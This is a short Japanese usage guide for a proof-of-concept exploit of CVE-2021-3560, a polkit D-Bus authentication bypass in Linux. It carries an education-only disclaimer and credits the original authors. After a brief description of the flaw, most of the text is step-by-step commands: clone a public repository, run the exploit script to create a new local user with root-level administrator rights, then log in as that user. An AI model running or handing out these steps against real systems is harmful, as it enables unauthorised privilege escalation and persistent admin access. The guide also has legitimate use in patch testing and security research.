
⚠️ 教育および許可されたセキュリティ研究目的のみ
オリジナルのPoC作者 @UNICORDev に大変感謝します (@NicPWNs と @Dev-Yeoj)
polkit が D-Bus リクエストの認証情報チェックをバイパスするよう騙される可能性があり、リクエスト元の権限を root ユーザーに昇格させることが判明しました。この欠陥は、特権のないローカル攻撃者によって、例えば新しいローカル管理者を作成するために悪用される可能性があります。この脆弱性の最大の脅威は、データの機密性と整合性、およびシステムの可用性です。

git をインストールし、GitHub リポジトリからスクリプトをクローンします:
sudo apt install git python3 -y
git clone https://github.com/asepsaepdin/CVE-2021-3560.git
以下のコマンドを使用して PoC スクリプトを実行します:
python3 exploit-CVE-2021-3560.py -u hacker -p password
注意: -u オプションで目的のユーザー名、-p オプションで目的のパスワードを指定します
以下のコマンドで作成されたユーザーを確認します:
su hacker
id